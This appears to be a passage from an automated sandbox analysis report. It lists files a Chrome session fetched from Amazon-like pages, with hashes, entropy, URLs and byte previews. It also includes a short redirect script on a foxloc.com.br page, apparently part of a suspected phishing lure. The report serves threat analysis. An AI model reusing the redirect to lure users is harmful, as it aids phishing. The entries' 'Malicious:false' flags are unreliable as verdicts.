                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x250, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):22896
                                                                                                                                                                                                        Entropy (8bit):7.8873079117695
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:nzkybpx1lwP/VVHc3RcHU5RVLX+/qq22NWjzAUV3ewts0dZPHFHA6iIguh93T5SV:n7bXwP9e3RcUniN+Aguw6EZ1AG93Euah
                                                                                                                                                                                                        MD5:CAB7B939BCF792AB7FF459DE1836C756
                                                                                                                                                                                                        SHA1:626A6D3671974141C68D9090D861486EB0566FD5
                                                                                                                                                                                                        SHA-256:183F54292331B63E626988654862A422EEE2B874E6C5F702C73605B02DBED8A5
                                                                                                                                                                                                        SHA-512:FA4A72C8B814344013375838D0EEF7BD608D0A3FA2778855BDD4912EE07004F927A0F1177708CFA6E8AE616B241913A45445C53851966B1F085E033D5E7317A7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/bts24_L2_header_web_en.jpg
                                                                                                                                                                                                        Preview:......JFIF..............Exif..II*.................Ducky.......d.....0http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.11 (Windows)" xmpMM:InstanceID="xmp.iid:B0146E5450F511EF853488AA7DE8D6DE" xmpMM:DocumentID="xmp.did:B0146E5550F511EF853488AA7DE8D6DE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B0146E5250F511EF853488AA7DE8D6DE" stRef:documentID="xmp.did:B0146E5350F511EF853488AA7DE8D6DE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...................................................... ....+!.$...2"3*7%"0...................."...........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 105x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3786
                                                                                                                                                                                                        Entropy (8bit):7.870535238828665
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TsefbWygDbCK3pIH0sCdum0V89hY3k9l9fE:zWR+PUsJm0qV9l1E
                                                                                                                                                                                                        MD5:F70CF02184098ECC2A7C33757C0EA1BB
                                                                                                                                                                                                        SHA1:614A91C7E16A8976D527F23BBC1E498F1C5B3061
                                                                                                                                                                                                        SHA-256:B2297F95EE752C2309299290DF2341C3BF8809A1187DCB4796F5F2A2484F481E
                                                                                                                                                                                                        SHA-512:DC1849873A9934396A04C07F4BB2783E9E22607849262F66048388B3AFCF84F26EF43BEFDDBB45FB2ADFD48EECF634E96B702C60B32AE2C2DE88FF5F64A44114
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........i.."..............................................................!..1"24Qqs....#36Aart...B..5CSb.....RT......................................................?...)@..o,...If'..FI'..W7P.h.}.r..k...].B..G.'....Y...}...{$..l.E....|.[|H.9E.;C~.bQX...'.f..O.LS....."*DAK.*d..>)=.[#5.N.:j..... ...(Pvx.I..'$)..+W.H.4.`..A.[.....;.....c.m.`.....C#..L.X..n#.YZ.b.N@%N...f.l.F.4.W. ..u..3.dc$..e....\...q.>....57Y.....q3m^.b......*\..Q...........Z9m...(.4l.FY.7.......R.....%.....RT...).W$8.`.v.~2...1..n.*.n9Lx...'p.0.8..L.(x.2... .Wm.G.|B...o.J.F.l....9U*...$.#..m/......d"9.7(`Y.+,P...<.9...."...)@.)@.*3.....#.W....|T..^C..;..r.. *z..5....Yl../..)2..p.;..B.0..i.F.X../.k]...J.f.6.8....x|...l.1..c.p...-.X.-.m.x...m.nC.L..`.T..V..Z.$D.....J.......r........:.s..4.[.KY{......@..F...3...eH...M..A...($..q
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D417%26pc%3D5153%26at%3D5153%26t%3D1723729121682%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:5152
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11474)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11547
                                                                                                                                                                                                        Entropy (8bit):5.662179970038899
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:rUsYwI08mI0kFoC2Z006u3QQOfUMw7whwuwgowgw0KjywPSCUkT9kC7Sm05vOhp0:rUsYwr8mI0vj006uHOfUMw7whwuwDwgR
                                                                                                                                                                                                        MD5:AE5F6E782A544151556463B969BFF19E
                                                                                                                                                                                                        SHA1:8F5B0B478E5189A5168E3E940F0C3DDF6B628E1C
                                                                                                                                                                                                        SHA-256:23EE80CFE4375317F68B69F0665CDE2DA74CFDD6BD32E020D98ED0A3E9367B78
                                                                                                                                                                                                        SHA-512:C4D989B39BCDA09B312AC27187DC6700D6259A5F1BFF950717411D7F34F8ED4CFEA9C0682F260065CD69EF4EBF7A378D3C75A6944DF1EF103E74E2E03A4D7959
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/31hiPNm4EZL.js
                                                                                                                                                                                                        Preview:"use strict";(self.discountWidgets=self.discountWidgets||[]).push([[532],{7925:(e,o,t)=>{t.d(o,{Z:()=>_});const _={root:"ButtonLink-module__root_eh2cgp8M2THLjamsgeRE"}},5700:(e,o,t)=>{t.d(o,{Z:()=>_});const _={message:"ConnectionProblem-module__message_JdHSKUuTcV1JaZ2wrCVD"}},7870:(e,o,t)=>{t.d(o,{Z:()=>_});const _={root:"ErrorGrid-module__root_OsEbvqDKCdYp7U_xun29"}},9570:(e,o,t)=>{t.d(o,{Z:()=>_});const _={container:"GridItem-module__container_PW2gdkwTj1GQzdwJjejN",remoteContentContainer:"GridItem-module__remoteContentContainer_ymiGkvMEWVEuR0ms2DVe",remoteContainerGuardrail:"GridItem-module__remoteContainerGuardrail_q1NHdQCmffOPWtLZ19zp",remoteContainerWrapper:"GridItem-module__remoteContainerWrapper_apJ1kx4QfqZeFXudPZ_a"}},1282:(e,o,t)=>{t.d(o,{Z:()=>_});const _={remoteContentContainer:"GridRow-module__remoteContentContainer_v6yj7EBU09SkoN9QQamg",container:"GridRow-module__container_q6XsDi4clqdE6jhYFSBW"}},4906:(e,o,t)=>{t.d(o,{Z:()=>_});const _={root:"LoadMore-module__root_weRWw3lb
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                        Entropy (8bit):4.017824858003425
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:kY4L4NKbvn:kY4EIn
                                                                                                                                                                                                        MD5:734930DCDBA2810CE73FE5069CC19669
                                                                                                                                                                                                        SHA1:81CAF1CBA98DBEAF1A9E7640B0B85071D099254C
                                                                                                                                                                                                        SHA-256:38956056E9E4D8C6798025989C602B9287F3B4477754CEBD04A48520E9490377
                                                                                                                                                                                                        SHA-512:DD2B4AF207BE550370A4B6E1780AF00C78BA68318F30C4DA5AF1F231B7E045DFF62CDDFD5FDA63C716A70CD6EEFE0C5C012262DA0AACD2E8E6718DECBB6C3A5E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<UnknownOperationException/>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3606
                                                                                                                                                                                                        Entropy (8bit):7.865617606086335
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T77nNfLyyTpC+GIjb834axsrQrRYa2Q6CLew0lI8:rNfLy+L1P8ocsrQrT2HBw0V
                                                                                                                                                                                                        MD5:C7E9A787CD227345D9BBF657539486A4
                                                                                                                                                                                                        SHA1:94AF63EA68CBE27EBF88FE29C08AB50B21716606
                                                                                                                                                                                                        SHA-256:CA41DDB26D54AF0F2B8E887E5ADC039FF78834105B0C63279E0EF8019E486FBF
                                                                                                                                                                                                        SHA-512:8118DD5FF6B66D7A9D9F9027C43346C5A293CDF6CD0CD7810872C74966D4D1587E446420E46BE5B75B0D6C17889491B9ACBC6BE7C91E432B5A34D28717980A93
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1a..AQq."....2....#$Cbr...3BR..................................................1..!"2Qq..#3ABa.................?..:R.1LR....(.)J.^.K..._.$.W..H..]...X.+;y$F0.$.h...M..@..Q...Q[d..V=D.W....*.q.e.]..u..0...0M.a..9.a.-v^..C....[..:.cpx.%...n..J...>..cJ....U.m.{Y.o$.........Q\.y..bqk...,..=.W.6.K.?e.;Kamoo!B.Q.Q.xr"...t.5..[B...*..G\9.).<...=I...u.......L..W.....meq....!H!.o.V..g...'.5-.4j}....}......w."....8a.P.....t.s1#.'.wM..2;"..T.K.O..*R..)@)JP.R......)@)JP.R..;Y.E......j............L....y.....w2+....r2...Y...#.k.........VD<C+.....oI..=..}..).y2#v.F.5.j._.....-y..P.d)2i...x...y.=.=x.../n......J.O0.9....X8...Fb..HH...].{.q....Kke..bNK..Q.G...g.(F-..g.`..R?...mum.......}6..[.M".&f"M....#..9..&.Z..qo....2....B. q.FR@9m'..ReR.S.....I..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15539
                                                                                                                                                                                                        Entropy (8bit):7.929437795867734
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Yp4oYjAch7EtIBkW3uGM0BgXMsMbBMuddQuz6kQxIxrudY:boYEYBdyXMsMJj+9Q0Y
                                                                                                                                                                                                        MD5:797A61FEA04AA45AFEE5BC49B594FCAF
                                                                                                                                                                                                        SHA1:62D77494CF584C0315DF706C9AFB5E8731704B18
                                                                                                                                                                                                        SHA-256:C23353D7D69C21416AAEFA0866A2323EF41D96F1C8F2C7C542783448B13FA51A
                                                                                                                                                                                                        SHA-512:BA665B7E463A2A277CEAE8ABEAC13251FFB3EC70809D5A00D8F685B35ED0141C55236196B42F95CD2E0841B473653CE0C9D24155F95A7250F036E48B67FC1BAB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................X..............(.L..t..Z..c.l.[4...*...........A.(......."........V.M..:..q>..].Z..[F....1....c...KH........x...U.^n;..3..|..............."......X.4.a......&z.].#/..d.-.{a.OHU...<..k<...R....9.W.XHnTC{.8.G..O'.{jO..'......"...c....T....1..G.j..5.#d...4Q.SW.R..z.#]_k..^]uL.1R.YF.....4d..... bhF.W...=.n.i.o...Jw ............U.\.-rn5.h.J.......!.......hH...A....&...T..G.tu.x.f..1Z..2...$o...2.jT..........:../T............E,g....cd`.sJ....3.....g...x....c.5...EH........<.u.2x...]3(:.2..)..<'...%W".........5.y.T.k$`..P..). .......sD@..F.k....s^.....`......9X......7..%W.(...*.......E7..4c\.8...).".f..SFWc.W.h..Z.#.V.....,#..0.........?K.g.<....)@...P..Q...>5...#,...6=.P....+.<%vK.^9."d....5.l*.;..nL0@k.x........_._2...YRX....E@...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):264
                                                                                                                                                                                                        Entropy (8bit):4.9889439763238475
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:h4QW3taMb/0MbfIuPxm9/UAY8SYfmFr7VWs8zMWXfGb:hPgke/LbfIuZY/Ur8hfQr7VWs8zMWPGb
                                                                                                                                                                                                        MD5:4B313268E87BCFA907A4C973B4D5DB2D
                                                                                                                                                                                                        SHA1:EC37B09124AC8984A037C3DCC40CA03B72250C5B
                                                                                                                                                                                                        SHA-256:6A1D8A7446DA17C7EE69E19BA4323ED8DCE2882D551EEBE76586C523C6AC94B2
                                                                                                                                                                                                        SHA-512:7003FADAAF7E2CE7DC869DE7835FACCA1B67EC3A3E526D836EE27C47F7CDE24AE46CE1307FE0A9896D52A0D3F06CF39F21007303E9F0DF35C3D95DFB1B167570
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://foxloc.com.br/g63a/Gcgaming/423184/
                                                                                                                                                                                                        Preview:<!DOCTYPE html>..<html>..<head>.. <title></title>..</head>..<body>.. <script>.. var u = window.location.href.lastIndexOf("/") + 1;.. var d = window.location.href.substring(u);.. window.location.replace("/0/index.xml" + d);.. </script>..</body>..</html>
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 149x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6247
                                                                                                                                                                                                        Entropy (8bit):7.931075673008785
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TpRE1kdTwKNDKsA1fJBO4L4DDzIADaOrPHWu+qhr6TBkE4UG4NvilU273:MudtzA9DVMDDz/aOTHt6T3hNaJ73
                                                                                                                                                                                                        MD5:566261D0BB02E70575E03735FB6CDA05
                                                                                                                                                                                                        SHA1:94AAC223461646A349787FF57C2728E120D62B86
                                                                                                                                                                                                        SHA-256:11122111563CFC2812D9471DA93BF505B71168E5AB7DDF14DECEE0E3808B758F
                                                                                                                                                                                                        SHA-512:A5C0A1E6FC3D6BFB849203170CA21EC2AC6FD471ACEFA3F38ED12D7BE6480BD6939749105D1186A143B60A861BE628295F97DB0549EA56D7F8709795D4CEB016
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..A.."Qaq..6u.#2BRSrst.......$3...&45bc.....................................................!1..AQa..............?...o.ox.H\.Xm.R........E}:....O..?WN|.9.....k.2)`. ..-....Q.$nm.........$.w..<4.@r`....5.w..]cN. ..!.....2z..@8.......e.y.............>...7r...,.p..._......t.dI....0..s..6..U.i.....?..o.r1^.8......0;m@>........(..F...Sv:......A.....9N.%>.av.H..w...FH?...g<.q..+@.....R.\H..m..9.....R.1.Lxx...A.5..e|....(.....'."...R...g..(..!.c..=Z.qll...>....>..r.9...xl.uV.G..c...m..Z.u.c..h1..0.y`.r.'-Z....(.+x.T1.tH.O.]..t#..4.Pf?l. 2.....ciZ.Ky../.f..Zg`0s.=....R.!...........k.Mw.X....2....X.2_.d....L..t....a.-^.V(#.c.*2v{..%G}.q...1.6]....P8 .$..p.'...V..s....k.h.Eq...*...Z..1.....+?....H_R.9.H...<P...xn..V..Z..E.....k.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D1936%26pc%3D8766%26at%3D8766%26t%3D1723729140976%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:8765
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5965
                                                                                                                                                                                                        Entropy (8bit):7.9154039698982865
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TX7WqMjQyLluGzS7SRMFNeLl9Z7kE3P5NzNZtAovngqXTfXoPOgISMTRNTsDiJT:jMjQWTe7tFNedY05NN8ovngyTvWISMTX
                                                                                                                                                                                                        MD5:572D7DCB74CC4CDDA68B6D72131BBA88
                                                                                                                                                                                                        SHA1:46396B01AE000A46A9017F9286630677B1899DB3
                                                                                                                                                                                                        SHA-256:529E6CCD854ED9FB399C48F9519029F2E2097349C35CC5D3BEE43331594DFFFD
                                                                                                                                                                                                        SHA-512:DC28DB478DF3570BDB472366823DB92BFAE896F528FC86EBB8BC53A7B789CC8A9F5044F11CF195C12C90C797B3C7B4710A13A7C02FF8FF137E5B301DA4D1E7CB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!..1."AQ...2a.#BRq....$34S.Cbrs..t..................................................!.1..A"2Qaq......#R$c...............?..V..")JR"..")JR"..")JR"..")JR"..")JR"..")JR".."+R{..*..>d...5.Q?T.[Y..S.d..j.s.iE8....:.{...RYu.UP^tZ[.>....(....v. ..3....oa*Y%....e......+..k.o.R.s".^KJq..G.z.R..4..u.9......D|s...Oyc... ...|..[..=....xo...o..@...U......fG).....|...rjC..i.....a..v0X.x.s.R...:... ...gq..zk....u.I.#.lD.[...l.`+<#....u.....>~.E.L..>.J#..C(g...'>.....M..f~...9..N6.b..Qq..3.j.=w...?n....J.u6>1......K.~..l.c..L...o.Z..V#Y..~...l...4.Z.`]..v.Fb.. .6.0.M(r..($.....1.3...S..=..D..]k....x"On>.#.....h...@.......i."b..[]............4.%..\.1|.....]S.u...2-.......;.........t-..zz.k.3.$du..}..._.~f.......W>Y...rQs.RZ........]....)JT..)JR
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x177, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6549
                                                                                                                                                                                                        Entropy (8bit):7.8749895381371005
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:xLB8JaZKCd3Wt7XKHU9OX3RDZi1Tyr0bJwey:5iJah1WQ09EwTI0ly
                                                                                                                                                                                                        MD5:1869047B8E54DCB227882857514E7FC5
                                                                                                                                                                                                        SHA1:FDDDEC77689FA5F82B2A88715F72BEBBEB690EB3
                                                                                                                                                                                                        SHA-256:C811DFEC0D2E05AC1C0F18A709868099966A53ADC99BCD70F4D37286A8295D44
                                                                                                                                                                                                        SHA-512:A4ABAA9726B041F9C3C6CC7ECE8D2CFA25ED768FB185DA87860A6950FDC8FE6918303DE96C3DB67A2DF61096E099B7FB757C07228C9A33FE0DAC28753E7FA700
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/412wR+9jt1L.AC_SX250.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4......................................................................R..m...Il5.Rh..6t..?...V......".NU..jz:..U.l.l..R...X{.>.g.K...DR9gjcv.Q.^.(N......=^..y.MWJ..{.zZ..~...-..{w7.!..;7...#..(..$n..!:..f.1...s.G.V...?.-...G.....vY.......)..}.`l.=..Q.y*...V.t.."on..........|.>.3wn...._....J.D......!.[s.^.].^J.|~.c...;....;.I[...d....................K.a.4.m......a....CJtN..r}...sv{.ITY.9......{../....<..d...{...I20;3...o#./..4..A.*.%.75.n.El........=.....G.M..Mq..bVS,..kwQ...5%.y.k..rK8{...../.M6r~.s...IJ8....e..h..D..G?j............K./Mx.$........S7..y..q`U<.........N.17...../..P..-..........Q}..M.}Ql.)W.m...[X<...........E...........,.........................!."1 0@.2Q.#ABS3P.............2.p.;.3..v..6.k.j....S.I.)..C..;.-.mvs.o.k.z.x]..'....I.A.U...4...6..p.7RI...j..VR.3i4.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D946%26pc%3D5788%26at%3D5788%26t%3D1723729113768%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5787
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x215, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2814
                                                                                                                                                                                                        Entropy (8bit):7.601331360773451
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0cGL1C0ODMGZ6O3znLhiUq1Szz1j1l9hlGxwnzlJIEgC2Vfk4d+a593n:THgYjDnFDqE/9zrR2Vfkfaj
                                                                                                                                                                                                        MD5:CD5F0A9DFD641BD05782DC8328E689D6
                                                                                                                                                                                                        SHA1:2D9A8A88B0B85A9F8CA9310BBF301F437B86026D
                                                                                                                                                                                                        SHA-256:90D7F34DFD5BA32A7C5A7AC665A6A602998B08B5B1CFD7C37EBFC86614AB90EC
                                                                                                                                                                                                        SHA-512:73D0C8711C69739B65CCCD9DE943723AB3AE2E874A84130CE903AEA23EBEC7FC73EF9BFEAFD95BF7DA9EAEC69A5FD77360D69CAE33BEF1063E1907407F463BD3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2...............................................................n...g..\).|.U.~/.....NW...~..'....^.;;.h.;#...........;....\.....\.....g..*|..E....5.@.d..J.i....u.o.....R. ..K....6S@.. :.....o.......,..jQ.U.u...%@X..........8YK, .YD.F.H...o..u..,.....u.....e...4@,..:.u...(%..G............d...$.. K.YFl.R..`.>..u._..5..X..Z.Qe.Q.h.D.e`.R./>...9\^Y5..X...)..!PK)TH.4D.:..=......O..4.X.(),.:...@.T,....W.<......=#.............43..)....A....@...c......C.......K.a...s_..99..e,S .......w................O...?N......:9o...................?.?.....(........................@..2A.1."!0. B............3.U.\.....#}.%yK...j..B;U..W...|...!!....J.....^..*..+a[..V.........x....Ev"..}.L9;..FF..9=MGk.$M7.....V..=...NC..h.~..h....F.}......7.HT....7.M.....GA...].9;:k..'gMw........5.......'gMw........5
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2016), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2016
                                                                                                                                                                                                        Entropy (8bit):4.906327037241394
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:BA5QAlm7Alm9OFhEiYEmHEh8ES6CseXxE:B2dmSmgFgE2EON+9
                                                                                                                                                                                                        MD5:10553C38CB9EA4054D52B3F852D176BA
                                                                                                                                                                                                        SHA1:D55BA62447F1845208606EE41A2C446C8960246A
                                                                                                                                                                                                        SHA-256:D384613164FB3CEEC12B72E026BC045664A1C6557BB1251531EF127910C3A46B
                                                                                                                                                                                                        SHA-512:828C2C2EA4203077DFE55615FDBB21B7615876026E76B4C30A884C6EB4D1FACABCBC7134F7A187BE2AE66614DFC09A44DE64012B9698EE6DAF3F2732534D380B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
